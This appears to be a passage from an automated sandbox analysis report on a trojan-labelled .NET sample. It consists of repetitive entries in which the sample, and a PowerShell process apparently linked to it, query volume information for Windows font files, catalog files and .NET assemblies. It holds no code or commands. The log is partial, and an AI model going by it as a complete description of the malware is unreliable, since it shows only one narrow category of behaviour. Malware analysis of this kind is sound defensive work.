Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
